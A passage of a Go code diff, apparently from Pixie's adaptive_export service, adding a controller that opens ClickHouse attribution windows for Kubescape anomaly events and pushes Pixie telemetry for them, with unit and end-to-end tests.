<table>
. Used in environments where the cloud's + // retention plugin can't reach the in-cluster CH service. + PushPixieTables []string + + // PushRefreshInterval — how often pushPixieRows re-queries pixie + // while the attribution window is still active. The first query + // covers [t_start, now]; subsequent queries cover only the new + // per-table slice [last_upper[table], now] so we don't duplicate + // rows. Zero (the natural Go default for unset env vars) is + // rewritten to 30s in defaulted(). To DISABLE periodic re-fan-out + // (single-shot mode, which loses pixie traffic that arrives after + // the kubescape event) set this to a NEGATIVE duration — pick -1 + // to be unambiguous. + PushRefreshInterval time.Duration +} + +func (c *Config) defaulted() Config { + out := *c + if out.Before == 0 { + out.Before = 5 * time.Minute + } + if out.After == 0 { + out.After = 5 * time.Minute + } + // Zero → fall through to the 30s default. NEGATIVE values are + // preserved so callers can explicitly request single-shot mode + // (see PushRefreshInterval doc above). + if out.PushRefreshInterval == 0 { + out.PushRefreshInterval = 30 * time.Second + } + return out +} + +// Controller is the live orchestrator. One instance per operator process. +type Controller struct { + trig Trigger + sink Sink + clock Clock + cfg Config + querier PixieQuerier // nil disables operator-side pixie pushes + + mu sync.Mutex + active map[anomaly.AnomalyHash]*sink.AttributionRow +} + +// New wires a Controller. nil clock falls through to RealClock. +// nil querier disables the rev-1 push path (controller will only +// write attribution rows; expects cloud's retention plugin to write +// pixie tables). +func New(trig Trigger, snk Sink, cfg Config, clk Clock) *Controller { + if clk == nil { + clk = RealClock{} + } + return &Controller{ + trig: trig, + sink: snk, + clock: clk, + cfg: cfg.defaulted(), + active: map[anomaly.AnomalyHash]*sink.AttributionRow{}, + } +} + +// WithPixieQuerier wires the rev-1 path. Returns the receiver for +// chaining. Idempotent — call before Run. +func (c *Controller) WithPixieQuerier(q PixieQuerier) *Controller { + c.querier = q + return c +} + +// Rehydrate populates the in-memory active set from ClickHouse so a +// restarted operator picks up where it left off. Idempotent. Call +// once at boot before Run. +func (c *Controller) Rehydrate(ctx context.Context) error { + rows, err := c.sink.QueryActive(ctx, c.cfg.Hostname) + if err != nil { + return err + } + c.mu.Lock() + defer c.mu.Unlock() + for i := range rows { + row := rows[i] + c.active[row.AnomalyHash] = &row + } + log.WithField("rehydrated", len(rows)).Info("controller: active set restored") + return nil +} + +// Run subscribes to the trigger and processes events until ctx is +// cancelled or the trigger closes its channel. Returns ctx.Err() on +// cancellation or nil on graceful trigger shutdown. +func (c *Controller) Run(ctx context.Context) error { + ch, err := c.trig.Subscribe(ctx) + if err != nil { + return err + } + for { + select { + case <-ctx.Done(): + return ctx.Err() + case ev, ok := <-ch: + if !ok { + return nil + } + c.handle(ctx, ev) + } + } +} + +// handle processes one event: open or extend the attribution row, +// then persist to ClickHouse. Errors from Sink.Write are logged but +// not fatal — system stability rule. 
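+// Worked example with the 5m defaults: an event stamped 10:00:00 that is
+// handled at 10:00:01 opens [t_start=09:55:00, t_end=10:05:01]; a repeat on
+// the same hash handled at 10:02:00 extends t_end to 10:07:00 and leaves
+// t_start untouched.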
+func (c *Controller) handle(ctx context.Context, ev kubescape.Event) { + hash := anomaly.Hash(ev.Target) + now := c.clock.Now() + tEvent := eventTimeToTime(ev.EventTime) + + c.mu.Lock() + row, exists := c.active[hash] + if !exists { + row = &sink.AttributionRow{ + AnomalyHash: hash, + Namespace: ev.Target.Namespace, + Pod: ev.Target.Pod, + Comm: ev.Target.Comm, + PID: ev.Target.PID, + Hostname: c.cfg.Hostname, + TStart: tEvent.Add(-c.cfg.Before), + TEnd: now.Add(c.cfg.After), + LastSeen: tEvent, + LastRuleID: ev.RuleID, + NAnomalies: 1, + } + c.active[hash] = row + } else { + // Extend t_end if the new now+after is later. Never shrink. + if proposed := now.Add(c.cfg.After); proposed.After(row.TEnd) { + row.TEnd = proposed + } + // Update last_seen if this event's timestamp is more recent. + if tEvent.After(row.LastSeen) { + row.LastSeen = tEvent + } + row.LastRuleID = ev.RuleID + row.NAnomalies++ + } + snapshot := *row + c.mu.Unlock() + + if err := c.sink.Write(ctx, []sink.AttributionRow{snapshot}); err != nil { + log.WithError(err).Warn("controller: sink write failed") + } + // Rev-1 path: on a NEW window, query pixie for the [t_start, t_end) + // slice of every PushPixieTables table for this (namespace, pod) + // and write rows directly to CH. Done in a goroutine so the + // controller doesn't block on PxL execution (each query can take + // hundreds of ms; 12 tables sequentially would stall the trigger). + if !exists && c.querier != nil && len(c.cfg.PushPixieTables) > 0 { + go c.pushPixieRows(ctx, snapshot) + } +} + +// pushPixieRows fans out per-table PxL queries and writes the results +// to forensic_db.
<table>
. One goroutine per anomaly window. The first +// pass covers [t_start, now]; subsequent passes (every +// PushRefreshInterval) cover only the new slice [last_upper, now] so +// pixie traffic that arrives AFTER the initial kubescape event still +// makes it into CH. Loop exits when the (possibly extended) t_end is +// in the past or ctx is cancelled. All failures are logged + non-fatal. +func (c *Controller) pushPixieRows(ctx context.Context, initial sink.AttributionRow) { + target := anomaly.Target{ + PID: initial.PID, + Comm: initial.Comm, + Pod: initial.Pod, + Namespace: initial.Namespace, + } + log.WithFields(log.Fields{ + "hash": initial.AnomalyHash, + "pod": initial.Pod, + "comm": initial.Comm, + "tables": len(c.cfg.PushPixieTables), + "refresh": c.cfg.PushRefreshInterval, + "t_start": initial.TStart, + "t_end": initial.TEnd, + }).Info("pushPixieRows: starting fan-out") + + // Per-table watermark of pixie data we've already pulled for THIS + // hash. We advance a table's cursor only after BOTH the query AND + // the sink-write succeed; failures keep the cursor in place so the + // next pass retries the same slice instead of dropping it. + lastUpper := make(map[string]time.Time, len(c.cfg.PushPixieTables)) + for _, t := range c.cfg.PushPixieTables { + lastUpper[t] = initial.TStart + } + pass := 0 + for { + if ctx.Err() != nil { + return + } + // Re-snapshot the active row each iteration so we pick up t_end + // extensions from concurrent kubescape events (extending the + // window beyond the initial t_end). COPY the row out of the + // shared pointer before releasing the mutex — handle() mutates + // the same struct, so reading TEnd after Unlock would race. + c.mu.Lock() + live, exists := c.active[initial.AnomalyHash] + var current sink.AttributionRow + if exists { + current = *live + } + c.mu.Unlock() + if !exists { + log.WithField("hash", initial.AnomalyHash). + Info("pushPixieRows: window closed (active entry gone)") + return + } + now := c.clock.Now() + if !current.TEnd.After(now) { + log.WithFields(log.Fields{ + "hash": initial.AnomalyHash, + "t_end": current.TEnd, + }).Info("pushPixieRows: fan-out complete (window expired)") + return + } + + pass++ + for _, table := range c.cfg.PushPixieTables { + if ctx.Err() != nil { + return + } + sliceStart := lastUpper[table] + sliceEnd := now + if !sliceEnd.After(sliceStart) { + continue // tiny / inverted slice — skip + } + q, err := pxl.QueryFor(table, target, sliceStart, sliceEnd, now) + if err != nil { + log.WithError(err).WithField("table", table).Warn("controller: QueryFor") + continue + } + qctx, cancel := context.WithTimeout(ctx, 30*time.Second) + rows, err := c.querier.Query(qctx, q) + cancel() + if err != nil { + log.WithError(err).WithField("table", table).Warn("controller: pixie query") + continue // do NOT advance lastUpper — retry next pass + } + if len(rows) > 0 { + if err := c.sink.WritePixieRows(ctx, table, rows); err != nil { + log.WithError(err).WithField("table", table).Warn("controller: pixie row sink") + continue // do NOT advance lastUpper — retry next pass + } + log.WithFields(log.Fields{ + "table": table, + "rows": len(rows), + "hash": initial.AnomalyHash, + "pass": pass, + }).Info("pushed pixie rows for active anomaly window") + } + lastUpper[table] = sliceEnd + } + + // Refresh interval treats negative as "single-shot" so callers + // can opt out via the dedicated negative sentinel; the default + // is 30s, set in defaulted(). 
Zero is reserved for "use default" + // to keep the env-parsing layer simple (env unset → 0 → default). + if c.cfg.PushRefreshInterval < 0 { + log.WithField("hash", initial.AnomalyHash). + Info("pushPixieRows: fan-out complete (single-shot mode)") + return + } + if !sleepOrCancel(ctx, c.cfg.PushRefreshInterval) { + return + } + } +} + +// sleepOrCancel returns true on normal sleep completion, false if ctx cancelled. +func sleepOrCancel(ctx context.Context, d time.Duration) bool { + t := time.NewTimer(d) + defer t.Stop() + select { + case <-ctx.Done(): + return false + case <-t.C: + return true + } +} + +// Active returns the count of in-memory active hashes (test helper). +func (c *Controller) Active() int { + c.mu.Lock() + defer c.mu.Unlock() + return len(c.active) +} + +// eventTimeToTime converts forensic_db.kubescape_logs.event_time (UInt64) +// into a time.Time, auto-detecting the unit. Vector's kubescape sink in +// the soc lab writes unix SECONDS (~1.7e9), but other deployments may +// emit millis (~1.7e12) or nanos (~1.7e18) per kubescape's own field +// conventions. Magnitude check picks the unit so we don't silently +// misinterpret the same UInt64 across pipeline variants. +func eventTimeToTime(et uint64) time.Time { + switch { + case et < 1e10: + return time.Unix(int64(et), 0).UTC() // seconds + case et < 1e13: + return time.Unix(0, int64(et)*int64(time.Millisecond)).UTC() // millis + default: + return time.Unix(0, int64(et)).UTC() // nanos + } +} + +// PruneExpired removes from the in-memory active set every entry whose +// t_end is in the past. ClickHouse's ReplacingMergeTree handles +// table-side cleanup; this just keeps the operator's RAM bounded. +// Caller invokes on a periodic timer. +func (c *Controller) PruneExpired() int { + now := c.clock.Now() + c.mu.Lock() + defer c.mu.Unlock() + removed := 0 + for h, row := range c.active { + if !row.TEnd.After(now) { + delete(c.active, h) + removed++ + } + } + return removed +} diff --git a/src/vizier/services/adaptive_export/internal/controller/controller_test.go b/src/vizier/services/adaptive_export/internal/controller/controller_test.go new file mode 100644 index 00000000000..325626c9113 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/controller/controller_test.go @@ -0,0 +1,347 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
+// +// SPDX-License-Identifier: Apache-2.0 + +package controller + +import ( + "context" + "errors" + "sync" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink" +) + +// ---------- fakes ---------- + +type fakeTrigger struct { + ch chan kubescape.Event + err error +} + +func newFakeTrigger() *fakeTrigger { return &fakeTrigger{ch: make(chan kubescape.Event, 16)} } + +func (f *fakeTrigger) Subscribe(_ context.Context) (<-chan kubescape.Event, error) { + if f.err != nil { + return nil, f.err + } + return f.ch, nil +} + +func (f *fakeTrigger) push(ev kubescape.Event) { f.ch <- ev } +func (f *fakeTrigger) close() { close(f.ch) } + +type fakeSink struct { + mu sync.Mutex + writes []sink.AttributionRow + preload []sink.AttributionRow + werr error + qerr error +} + +func (f *fakeSink) WritePixieRows(_ context.Context, _ string, _ []map[string]any) error { + return nil +} + +func (f *fakeSink) Write(_ context.Context, rows []sink.AttributionRow) error { + f.mu.Lock() + defer f.mu.Unlock() + if f.werr != nil { + return f.werr + } + f.writes = append(f.writes, rows...) + return nil +} + +func (f *fakeSink) QueryActive(_ context.Context, hostname string) ([]sink.AttributionRow, error) { + f.mu.Lock() + defer f.mu.Unlock() + if f.qerr != nil { + return nil, f.qerr + } + out := make([]sink.AttributionRow, 0, len(f.preload)) + for _, r := range f.preload { + if r.Hostname == hostname { + out = append(out, r) + } + } + return out, nil +} + +func (f *fakeSink) snapshot() []sink.AttributionRow { + f.mu.Lock() + defer f.mu.Unlock() + return append([]sink.AttributionRow{}, f.writes...) +} + +type fakeClock struct { + mu sync.Mutex + t time.Time +} + +func (c *fakeClock) Now() time.Time { c.mu.Lock(); defer c.mu.Unlock(); return c.t } +func (c *fakeClock) advance(d time.Duration) { + c.mu.Lock() + defer c.mu.Unlock() + c.t = c.t.Add(d) +} + +// ---------- helpers ---------- + +var canonicalEventTime = time.Unix(0, 1744477360303026359).UTC() + +func canonicalEvent() kubescape.Event { + return kubescape.Event{ + Target: anomaly.Target{ + PID: 106040, Comm: "redis-server", + Pod: "redis-578d5dc9bd-kjj78", Namespace: "redis", + }, + EventTime: 1744477360303026359, + RuleID: "R1005", + Hostname: "node-1", + } +} + +func anotherTargetEvent() kubescape.Event { + ev := canonicalEvent() + ev.Target.PID = 999999 + ev.RuleID = "R0006" + return ev +} + +func waitFor(t *testing.T, what string, deadline time.Duration, ok func() bool) { + t.Helper() + stop := time.Now().Add(deadline) + for time.Now().Before(stop) { + if ok() { + return + } + time.Sleep(2 * time.Millisecond) + } + t.Fatalf("timeout waiting for %s", what) +} + +func runController(t *testing.T, c *Controller, trig *fakeTrigger) func() { + t.Helper() + ctx, cancel := context.WithCancel(context.Background()) + done := make(chan struct{}) + go func() { _ = c.Run(ctx); close(done) }() + return func() { + trig.close() + cancel() + select { + case <-done: + case <-time.After(1 * time.Second): + t.Fatalf("controller did not stop within 1s") + } + } +} + +func defaultCfg() Config { + return Config{Hostname: "node-1", Before: 5 * time.Minute, After: 5 * time.Minute} +} + +// ---------- tests ---------- + +// TestController_NewWindow_FirstAnomalyOnTarget — first event on a hash +// produces one Sink write with t_start = event - Before, t_end = now + After. 
+func TestController_NewWindow_FirstAnomalyOnTarget(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime.Add(time.Second)} + c := New(trig, snk, defaultCfg(), clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + waitFor(t, "first write", 200*time.Millisecond, func() bool { return len(snk.snapshot()) > 0 }) + got := snk.snapshot()[0] + wantHash := anomaly.Hash(canonicalEvent().Target) + if got.AnomalyHash != wantHash { + t.Fatalf("hash = %q, want %q", got.AnomalyHash, wantHash) + } + if got.PID != 106040 || got.Comm != "redis-server" || got.Namespace != "redis" { + t.Fatalf("identity wrong: %+v", got) + } + if got.Hostname != "node-1" { + t.Fatalf("Hostname = %q", got.Hostname) + } + wantStart := canonicalEventTime.Add(-5 * time.Minute) + if !got.TStart.Equal(wantStart) { + t.Fatalf("TStart = %v, want %v", got.TStart, wantStart) + } + wantEnd := clk.Now().Add(5 * time.Minute) + if !got.TEnd.Equal(wantEnd) { + t.Fatalf("TEnd = %v, want %v", got.TEnd, wantEnd) + } + if got.NAnomalies != 1 || got.LastRuleID != "R1005" { + t.Fatalf("LastRuleID/NAnomalies wrong: %+v", got) + } +} + +// TestController_Coalesce_SecondAnomalySameHash — second event on the +// same target reuses the same row, increments n_anomalies, extends t_end. +func TestController_Coalesce_SecondAnomalySameHash(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime.Add(time.Second)} + c := New(trig, snk, defaultCfg(), clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + waitFor(t, "first write", 200*time.Millisecond, func() bool { return len(snk.snapshot()) >= 1 }) + + clk.advance(2 * time.Minute) // 2 minutes pass; t_end should reset to now+5min + ev2 := canonicalEvent() + ev2.RuleID = "R0006" + ev2.EventTime = uint64(canonicalEventTime.Add(2 * time.Minute).UnixNano()) + trig.push(ev2) + waitFor(t, "second write", 200*time.Millisecond, func() bool { return len(snk.snapshot()) >= 2 }) + + if c.Active() != 1 { + t.Fatalf("Active = %d, want 1 (must coalesce on same hash)", c.Active()) + } + got := snk.snapshot()[1] + if got.NAnomalies != 2 { + t.Fatalf("NAnomalies = %d, want 2", got.NAnomalies) + } + if got.LastRuleID != "R0006" { + t.Fatalf("LastRuleID = %q, want R0006", got.LastRuleID) + } + wantEnd := clk.Now().Add(5 * time.Minute) + if !got.TEnd.Equal(wantEnd) { + t.Fatalf("TEnd = %v, want %v (must extend on coalesce)", got.TEnd, wantEnd) + } +} + +// TestController_NeverShrinksTEnd — out-of-order arrivals or repeats +// must not regress t_end backward. +func TestController_NeverShrinksTEnd(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + c := New(trig, snk, defaultCfg(), clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + waitFor(t, "first", 200*time.Millisecond, func() bool { return len(snk.snapshot()) >= 1 }) + originalEnd := snk.snapshot()[0].TEnd + + // fake clock REWINDS — pathological but defensive + clk.advance(-time.Hour) + trig.push(canonicalEvent()) + waitFor(t, "second", 200*time.Millisecond, func() bool { return len(snk.snapshot()) >= 2 }) + got := snk.snapshot()[1] + if !got.TEnd.Equal(originalEnd) { + t.Fatalf("TEnd regressed: was %v, now %v", originalEnd, got.TEnd) + } +} + +// TestController_NewWindowForColdTarget — different target opens a 2nd +// active row, preserving the first. 
+func TestController_NewWindowForColdTarget(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + c := New(trig, snk, defaultCfg(), clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + trig.push(anotherTargetEvent()) + waitFor(t, "two active", 300*time.Millisecond, func() bool { return c.Active() == 2 }) +} + +// TestController_Rehydrate_FromSink — boot reads still-active rows. +func TestController_Rehydrate_FromSink(t *testing.T) { + trig := newFakeTrigger() + t0 := canonicalEventTime + preload := []sink.AttributionRow{ + {AnomalyHash: "h1", Hostname: "node-1", PID: 1, Comm: "x", TStart: t0, TEnd: t0.Add(10 * time.Minute), LastSeen: t0, NAnomalies: 5}, + {AnomalyHash: "h2", Hostname: "node-OTHER", PID: 2, Comm: "y", TStart: t0, TEnd: t0.Add(10 * time.Minute), LastSeen: t0, NAnomalies: 1}, + } + snk := &fakeSink{preload: preload} + clk := &fakeClock{t: t0} + c := New(trig, snk, defaultCfg(), clk) + + if err := c.Rehydrate(context.Background()); err != nil { + t.Fatalf("Rehydrate: %v", err) + } + if c.Active() != 1 { + t.Fatalf("Active after rehydrate = %d, want 1 (must filter by hostname)", c.Active()) + } +} + +// TestController_PruneExpired — entries past their t_end drop out. +func TestController_PruneExpired(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + c := New(trig, snk, Config{Hostname: "node-1", Before: time.Minute, After: time.Minute}, clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + waitFor(t, "active=1", 200*time.Millisecond, func() bool { return c.Active() == 1 }) + + clk.advance(2 * time.Minute) // past t_end (now+1min) + if r := c.PruneExpired(); r != 1 { + t.Fatalf("PruneExpired removed %d, want 1", r) + } + if c.Active() != 0 { + t.Fatalf("Active after prune = %d, want 0", c.Active()) + } +} + +// TestController_SinkErrorNonFatal — controller does not crash on Sink.Write error. +func TestController_SinkErrorNonFatal(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{werr: errors.New("ch unreachable")} + clk := &fakeClock{t: canonicalEventTime} + c := New(trig, snk, defaultCfg(), clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + // Wait for the handler to process the event (no fixed sleep). + waitFor(t, "active=1 despite sink error", 200*time.Millisecond, func() bool { return c.Active() == 1 }) +} + +// TestController_RestartMidStream_Aborts — context cancel terminates Run. +func TestController_RestartMidStream_Aborts(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + c := New(trig, snk, defaultCfg(), clk) + + ctx, cancel := context.WithCancel(context.Background()) + done := make(chan struct{}) + go func() { _ = c.Run(ctx); close(done) }() + + trig.push(canonicalEvent()) + waitFor(t, "controller picked up event", 200*time.Millisecond, func() bool { return c.Active() == 1 }) + cancel() + select { + case <-done: + case <-time.After(300 * time.Millisecond): + t.Fatalf("controller did not abort within 300ms of cancel") + } +} diff --git a/src/vizier/services/adaptive_export/internal/e2e/BUILD.bazel b/src/vizier/services/adaptive_export/internal/e2e/BUILD.bazel new file mode 100644 index 00000000000..c9d81d75063 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/e2e/BUILD.bazel @@ -0,0 +1,28 @@ +# Copyright 2018- The Pixie Authors. 
+# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("//bazel:pl_build_system.bzl", "pl_go_test") + +pl_go_test( + name = "e2e_test", + srcs = ["e2e_test.go"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + "//src/vizier/services/adaptive_export/internal/controller", + "//src/vizier/services/adaptive_export/internal/sink", + "//src/vizier/services/adaptive_export/internal/trigger", + ], +) diff --git a/src/vizier/services/adaptive_export/internal/e2e/e2e_test.go b/src/vizier/services/adaptive_export/internal/e2e/e2e_test.go new file mode 100644 index 00000000000..71b7fc6cfbc --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/e2e/e2e_test.go @@ -0,0 +1,169 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package e2e wires the real Trigger + real Sink (both HTTP-backed) +// to a stub ClickHouse in-process and exercises the full +// kubescape→attribution path end-to-end. This is the highest-fidelity +// test that runs in `go test`. Real-cluster validation lives on the +// lab. +package e2e + +import ( + "bytes" + "context" + "encoding/json" + "io" + "net/http" + "net/http/httptest" + "strings" + "sync" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/controller" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger" +) + +// stubClickHouse emulates ClickHouse's HTTP interface: GET responds +// with a fixed kubescape_logs JSONEachRow body; POST records the +// INSERT body for later assertion. 
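+// The handler below asserts only two substrings of the trigger's poll, so
+// the query is expected to look roughly like (exact shape belongs to the
+// trigger):
+//
+//	SELECT ... FROM forensic_db.kubescape_logs WHERE hostname = 'node-1' ...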
+type stubClickHouse struct { + mu sync.Mutex + kubescape []map[string]any + insertedSQL []string + insertBody [][]byte +} + +func (s *stubClickHouse) handle(w http.ResponseWriter, r *http.Request) { + q := r.URL.Query().Get("query") + switch r.Method { + case http.MethodGet: + if !strings.Contains(q, "FROM forensic_db.kubescape_logs") { + http.Error(w, "unexpected SELECT: "+q, 400) + return + } + if !strings.Contains(q, "hostname = 'node-1'") { + http.Error(w, "missing hostname filter: "+q, 400) + return + } + s.mu.Lock() + var buf bytes.Buffer + enc := json.NewEncoder(&buf) + enc.SetEscapeHTML(false) + for _, row := range s.kubescape { + _ = enc.Encode(row) + } + s.mu.Unlock() + w.WriteHeader(200) + _, _ = w.Write(buf.Bytes()) + case http.MethodPost: + body, _ := io.ReadAll(r.Body) + s.mu.Lock() + s.insertedSQL = append(s.insertedSQL, q) + s.insertBody = append(s.insertBody, body) + s.mu.Unlock() + w.WriteHeader(200) + default: + http.Error(w, "method", http.StatusMethodNotAllowed) + } +} + +func (s *stubClickHouse) bodies() [][]byte { + s.mu.Lock() + defer s.mu.Unlock() + out := make([][]byte, len(s.insertBody)) + for i, b := range s.insertBody { + out[i] = append([]byte{}, b...) + } + return out +} + +func canonicalKubescapeRow() map[string]any { + return map[string]any{ + "RuleID": "R1005", + "RuntimeK8sDetails": `{"podName":"redis-578d5dc9bd-kjj78","podNamespace":"redis"}`, + "RuntimeProcessDetails": `{"processTree":{"pid":106040,"comm":"redis-server"}}`, + "event_time": "1744477360303026359", + "hostname": "node-1", + } +} + +// TestE2E_PushFlow_AttributionRowArrives — full chain: stub-CH serves a +// kubescape row → real Trigger discovers and parses → real Controller +// computes hash + opens active row → real Sink HTTP-POSTs INSERT to +// adaptive_attribution. Assert the resulting body carries the right hash. 
+func TestE2E_PushFlow_AttributionRowArrives(t *testing.T) { + stub := &stubClickHouse{kubescape: []map[string]any{canonicalKubescapeRow()}} + srv := httptest.NewServer(http.HandlerFunc(stub.handle)) + defer srv.Close() + + trg, err := trigger.New(trigger.Config{ + Endpoint: srv.URL, + Hostname: "node-1", + PollInterval: 30 * time.Millisecond, + }) + if err != nil { + t.Fatalf("trigger.New: %v", err) + } + snk, err := sink.New(sink.Config{Endpoint: srv.URL}) + if err != nil { + t.Fatalf("sink.New: %v", err) + } + cfg := controller.Config{Hostname: "node-1", Before: time.Minute, After: time.Minute} + ctl := controller.New(trg, snk, cfg, nil) + + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + done := make(chan struct{}) + go func() { _ = ctl.Run(ctx); close(done) }() + + deadline := time.Now().Add(2 * time.Second) + for time.Now().Before(deadline) && len(stub.bodies()) == 0 { + time.Sleep(5 * time.Millisecond) + } + bodies := stub.bodies() + if len(bodies) == 0 { + t.Fatalf("no INSERTs reached stub-CH within 2s") + } + + wantHash := string(anomaly.Hash(anomaly.Target{ + PID: 106040, Comm: "redis-server", + Pod: "redis-578d5dc9bd-kjj78", Namespace: "redis", + })) + matched := false + for _, b := range bodies { + if strings.Contains(string(b), `"anomaly_hash":"`+wantHash+`"`) && + strings.Contains(string(b), `"hostname":"node-1"`) && + strings.Contains(string(b), `"namespace":"redis"`) && + strings.Contains(string(b), `"pid":106040`) { + matched = true + break + } + } + if !matched { + t.Fatalf("no INSERT body had the expected attribution shape; bodies=\n%s", joinBodies(bodies)) + } +} + +func joinBodies(bs [][]byte) string { + out := make([]string, len(bs)) + for i, b := range bs { + out[i] = string(b) + } + return strings.Join(out, "\n---\n") +} diff --git a/src/vizier/services/adaptive_export/internal/kubescape/BUILD.bazel b/src/vizier/services/adaptive_export/internal/kubescape/BUILD.bazel new file mode 100644 index 00000000000..47b9b0b3481 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/kubescape/BUILD.bazel @@ -0,0 +1,37 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "kubescape", + srcs = ["extract.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + ], +) + +pl_go_test( + name = "kubescape_test", + srcs = ["extract_test.go"], + embed = [":kubescape"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + ], +) diff --git a/src/vizier/services/adaptive_export/internal/kubescape/extract.go b/src/vizier/services/adaptive_export/internal/kubescape/extract.go new file mode 100644 index 00000000000..be51d5159c0 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/kubescape/extract.go @@ -0,0 +1,117 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package kubescape parses the Kubescape-shaped fields of a +// forensic_db.kubescape_logs row into the source-agnostic types used +// downstream: +// - anomaly.Target — workload identity (used to compute the hash) +// - Event — Target plus event-specific fields (event_time, +// rule id, hostname) needed for window math + persistence +// +// This package is the only place in the operator that knows the JSON +// shape of RuntimeK8sDetails / RuntimeProcessDetails. Once an Event +// has been extracted, no further code needs to care that the source +// was Kubescape. +package kubescape + +import ( + "encoding/json" + "errors" + "fmt" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +// ErrIncompleteEvent is returned by Extract when one of the required +// fields (event_time, rule id, comm, pid) is missing or unparseable. +// Pod and Namespace are NOT required — host-pid processes legitimately +// run with empty pod / namespace. +var ErrIncompleteEvent = errors.New("kubescape: incomplete event") + +// Row is the operator-facing shape of one forensic_db.kubescape_logs row. +// JSON-encoded fields stay as strings — the operator parses them itself +// to keep the ClickHouse driver layer simple. +type Row struct { + EventTime uint64 // schema: event_time UInt64 (unix nanos) + RuleID string + Hostname string + K8sDetails string // schema: RuntimeK8sDetails String (JSON) + ProcessDetails string // schema: RuntimeProcessDetails String (JSON) +} + +// Event is one parsed kubescape anomaly: workload identity + the bits +// we need for time-window math and ClickHouse persistence. +type Event struct { + Target anomaly.Target + EventTime uint64 // unix nanoseconds — propagated end-to-end + RuleID string // diagnostic only + Hostname string // node-local key +} + +// k8sDetails captures only pod / namespace; ignore the rest so JSON +// evolution upstream doesn't break us. 
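+// A canonical RuntimeK8sDetails payload (see the test fixtures) carries
+// extra keys such as clusterName and workloadKind that are deliberately
+// dropped here:
+//
+//	{"podName":"redis-578d5dc9bd-kjj78","podNamespace":"redis",...}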
